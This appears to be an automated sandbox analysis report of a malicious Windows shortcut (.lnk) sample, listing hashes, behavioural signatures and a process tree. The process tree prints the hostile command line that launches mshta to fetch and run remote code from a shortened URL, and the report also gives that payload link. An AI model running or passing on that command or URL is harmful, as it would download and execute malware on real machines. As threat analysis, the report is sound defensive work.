Analysis
-
max time kernel
138s -
max time network
186s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 13:59
Behavioral task
behavioral1
Sample
d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
Resource
win10v2004-20220414-en
General
-
Target
d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
-
Size
1.2MB
-
MD5
365d95c0d0659a1081488460eadf8159
-
SHA1
63a3f87be4f037585f576599823557e5444084a4
-
SHA256
d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805
-
SHA512
41c49560683ee1611eb1143ca6babe650e336c33f7d58b67cb34e17e0450a9ef6b212fc318bc3601942e49acc3ba65aba86278bb6a60ac0764b9488036a4ca4a
Malware Config
Extracted
https://bit.ly/3eIxLAZ
Signatures
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exeflow pid process 8 3108 mshta.exe 11 3108 mshta.exe 23 3108 mshta.exe 37 3108 mshta.exe 38 3108 mshta.exe 39 3108 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2428 wrote to memory of 4104 2428 cmd.exe cmd.exe PID 2428 wrote to memory of 4104 2428 cmd.exe cmd.exe PID 4104 wrote to memory of 3108 4104 cmd.exe mshta.exe PID 4104 wrote to memory of 3108 4104 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/3eIxLAZ2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exeC:\Windows\System32\mshta https://bit.ly/3eIxLAZ3⤵
- Blocklisted process makes network request